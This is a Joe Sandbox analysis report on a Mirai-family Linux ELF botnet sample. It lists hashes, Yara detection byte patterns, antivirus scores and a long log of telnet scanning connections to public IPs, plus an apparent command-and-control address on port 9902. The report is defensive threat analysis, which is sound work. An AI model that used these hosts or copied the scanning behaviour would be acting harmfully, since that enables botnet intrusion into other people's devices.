Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
m1vvw0vLkD.elf

Overview

General Information

Sample Name:m1vvw0vLkD.elf
Original Sample Name:453686399d2b48540e597f8b122cf7de.elf
Analysis ID:1345555
MD5:453686399d2b48540e597f8b122cf7de
SHA1:fd076a2b2f0509ae92a1e60b3462faebb992521d
SHA256:d3a0623aeda320d3e2cf668cabcedc2dc06cba5adb33613d55e493d0e66811c3
Tags:64elfmirai
Infos:

Detection

Mirai
Score:76
Range:0 - 100
Whitelisted:false

Signatures

Malicious sample detected (through community Yara rule)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Sample is packed with UPX
Uses known network protocols on non-standard ports
Machine Learning detection for sample
Sample contains only a LOAD segment without any section mappings
Yara signature match
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
ELF contains segments with high entropy indicating compressed/encrypted content

Classification

Joe Sandbox Version:38.0.0 Ammolite
Analysis ID:1345555
Start date and time:2023-11-21 03:10:04 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 4m 55s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample file name:m1vvw0vLkD.elf
renamed because original name is a hash value
Original Sample Name:453686399d2b48540e597f8b122cf7de.elf
Detection:MAL
Classification:mal76.troj.evad.linELF@0/0@0/0
  • Report size exceeded maximum capacity and may have missing network information.
Command:/tmp/m1vvw0vLkD.elf
PID:5510
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Rakitin
Standard Error:
  • system is lnxubuntu20
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Mirai_12Yara detected MiraiJoe Security
    SourceRuleDescriptionAuthorStrings
    5516.1.0000000000400000.0000000000411000.r-x.sdmpLinux_Trojan_Gafgyt_9e9530a7unknownunknown
    • 0xbc9c:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
    5516.1.0000000000400000.0000000000411000.r-x.sdmpLinux_Trojan_Gafgyt_807911a2unknownunknown
    • 0xc48b:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
    5516.1.0000000000400000.0000000000411000.r-x.sdmpLinux_Trojan_Gafgyt_ea92cca8unknownunknown
    • 0xeab8:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
    5516.1.0000000000400000.0000000000411000.r-x.sdmpLinux_Trojan_Gafgyt_d4227dbfunknownunknown
    • 0xb002:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
    • 0xb110:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
    5516.1.0000000000400000.0000000000411000.r-x.sdmpLinux_Trojan_Gafgyt_620087b9unknownunknown
    • 0xc04b:$a: 48 89 D8 48 83 C8 01 EB 04 48 8B 76 10 48 3B 46 08 72 F6 48 8B
    Click to see the 37 entries
    No Snort rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: m1vvw0vLkD.elfReversingLabs: Detection: 31%
    Source: m1vvw0vLkD.elfVirustotal: Detection: 34%Perma Link
    Source: m1vvw0vLkD.elfJoe Sandbox ML: detected

    Networking

    barindex
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 57868
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58238
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 57868
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58244
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58244
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58504
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 59258
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 59766
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 59770
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 60468
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 32780
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 32788
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 33236
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 33242
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 34228
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 34648
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 34656
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 57290
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 57750
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 57758
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58152
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58596
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58604
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58992
    Source: global trafficTCP traffic: 192.168.2.15:53308 -> 45.88.90.129:9902
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 32.249.102.166:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 27.57.188.105:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 164.8.64.242:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 97.13.113.72:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 107.188.184.228:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 68.250.141.1:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 73.41.17.197:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 196.60.216.210:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 31.132.20.252:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 61.90.16.131:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 65.2.5.162:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 140.234.123.45:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 188.239.16.2:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 180.65.244.153:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 158.79.105.128:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 126.172.6.195:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 91.244.190.91:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 147.7.97.134:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 93.20.124.231:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 113.167.88.230:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 23.223.2.97:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 12.182.155.189:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 100.186.41.8:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 76.168.111.233:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 170.49.184.151:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 82.7.207.112:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 184.34.199.222:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 189.132.230.195:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 32.41.208.103:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 197.193.74.20:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 183.42.110.91:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 148.194.174.177:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 183.80.1.171:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 59.195.88.152:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 31.20.6.170:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 93.255.160.7:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 48.57.137.41:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 175.102.108.235:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 13.68.32.87:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 145.133.35.168:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 131.60.212.254:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 187.184.202.122:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 78.129.7.212:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 104.45.105.182:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 141.184.194.144:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 193.82.216.44:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 48.153.11.52:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 67.39.241.106:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 83.18.203.136:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 133.232.83.62:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 196.8.130.50:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 123.227.150.221:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 47.191.43.2:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 82.1.168.248:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 132.197.167.89:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 71.240.141.198:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 62.48.11.151:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 37.232.240.249:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 87.113.222.31:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 217.23.220.254:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 124.187.79.195:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 144.91.0.47:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 72.252.128.30:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 205.249.3.230:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 16.29.83.60:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 155.56.208.18:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 9.15.67.222:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 67.232.94.8:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 149.111.85.237:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 23.48.197.208:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 20.76.236.45:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 18.255.82.193:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 200.39.217.94:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 149.199.245.154:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 95.174.219.221:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 24.52.106.56:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 9.146.97.91:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 207.103.42.35:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 123.115.193.126:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 58.226.81.5:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 213.194.151.119:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 197.181.94.203:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 195.57.38.85:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 123.156.65.175:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 68.238.51.208:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 149.102.93.56:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 122.214.123.175:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 68.181.3.65:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 59.18.78.166:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 143.47.128.153:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 111.64.226.223:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 111.238.61.26:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 83.138.123.128:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 219.31.101.4:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 31.198.252.165:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 68.58.123.197:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 146.231.54.184:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 14.254.179.211:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 146.22.33.48:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 65.216.239.27:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 147.143.213.247:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 95.233.69.139:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 54.111.29.146:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 76.63.12.33:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 124.67.211.62:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 40.56.246.135:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 164.123.71.156:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 59.252.183.27:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 2.173.186.131:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 81.14.88.78:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 80.95.153.229:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 165.101.56.236:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 201.62.96.61:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 119.253.80.46:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 190.113.203.173:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 177.44.23.58:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 61.71.74.209:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 157.74.210.148:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 18.134.148.229:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 153.67.63.126:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 44.133.188.55:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 151.22.115.251:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 133.223.85.49:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 68.7.187.248:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 181.238.171.31:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 222.145.139.213:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 5.57.127.110:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 103.215.46.65:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 14.239.125.144:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 45.236.208.192:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 154.253.232.84:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 164.87.170.19:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 203.171.191.114:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 2.132.239.244:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 46.218.113.62:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 175.120.224.82:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 205.214.133.163:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 79.181.69.180:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 35.53.191.181:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 83.150.153.162:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 31.234.82.170:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 101.10.131.106:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 174.55.7.82:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 129.7.162.10:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 97.140.195.145:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 210.237.255.20:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 193.180.24.172:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 13.144.57.232:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 75.97.99.44:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 148.127.86.92:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 195.227.4.139:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 144.98.83.206:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 203.160.207.89:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 124.41.116.128:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 76.173.3.43:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 179.31.179.78:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 14.247.100.166:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 152.40.92.142:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 116.169.153.159:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 73.196.150.253:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 104.118.84.89:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 170.59.119.212:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 66.250.134.52:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 209.237.40.54:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 216.250.190.251:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 47.157.182.104:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 53.57.175.114:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 163.150.56.108:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 183.89.229.140:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 35.24.49.23:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 96.220.93.80:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 155.151.168.33:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 209.139.53.7:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 13.45.113.26:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 91.202.137.2:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 195.168.24.199:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 110.29.58.195:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 68.199.209.0:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 89.139.69.159:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 92.188.40.121:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 157.48.38.27:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 102.55.41.150:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 59.15.52.8:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 156.228.70.244:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 156.220.141.208:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 116.197.212.190:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 97.175.117.99:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 190.0.179.130:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 165.115.102.252:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 97.238.207.129:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 187.92.61.72:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 162.241.212.156:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 175.108.64.167:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 1.195.199.195:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 162.143.192.122:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 31.165.91.41:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 102.125.17.249:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 198.57.10.241:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 91.18.15.196:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 97.238.125.209:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 130.162.195.151:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 191.9.109.99:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 64.83.30.30:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 176.25.123.198:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 98.126.68.140:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 2.79.242.7:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 170.39.157.6:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 75.21.63.200:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 68.3.130.254:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 155.34.213.125:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 162.39.165.62:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 187.74.152.171:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 100.161.199.67:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 178.132.184.146:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 102.255.22.2:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 222.62.94.97:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 179.64.95.82:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 156.250.128.41:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 105.42.138.134:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 222.40.74.58:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 222.241.209.16:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 23.206.183.0:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 121.175.154.20:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 105.194.76.30:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 220.216.105.106:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 39.211.176.34:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 216.134.123.111:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 89.23.197.236:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 133.135.94.16:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 36.37.129.143:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 105.168.150.100:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 105.24.238.173:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 177.242.70.191:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 45.64.190.216:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 177.150.52.6:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 19.39.87.220:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 113.68.218.137:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 167.61.234.246:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 186.158.212.142:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 207.39.15.203:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 197.248.204.93:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 42.28.156.190:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 9.44.222.162:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 219.231.75.11:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 2.17.164.45:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 97.240.10.185:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 187.204.122.7:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 213.214.78.162:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 70.111.117.8:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 176.194.131.108:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 144.228.39.113:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 12.207.234.123:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 161.4.163.13:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 80.89.27.122:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 78.182.65.242:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 126.166.38.44:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 102.45.165.68:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 116.56.246.172:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 186.218.144.119:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 206.13.191.88:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 108.29.91.108:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 136.136.235.48:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 78.209.130.112:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 17.174.51.155:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 9.30.36.122:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 66.235.209.154:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 91.242.191.228:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 218.100.73.65:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 177.224.221.187:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 204.162.60.155:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 126.130.95.53:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 201.188.175.80:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 141.180.212.239:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 164.119.143.28:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 161.88.156.60:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 17.133.74.103:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 88.235.34.30:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 34.156.186.93:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 129.37.213.119:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 200.38.49.21:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 65.175.155.172:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 73.218.36.181:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 125.163.52.36:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 96.243.100.45:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 113.86.174.4:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 179.228.90.97:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 118.117.59.250:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 150.119.106.196:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 109.90.107.120:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 9.120.74.46:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 152.67.136.40:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 157.148.60.229:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 59.178.84.42:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 149.7.255.155:2323
    Source: global trafficTCP traffic: 192.168.2.15:48584 -> 76.129.40.21:2323
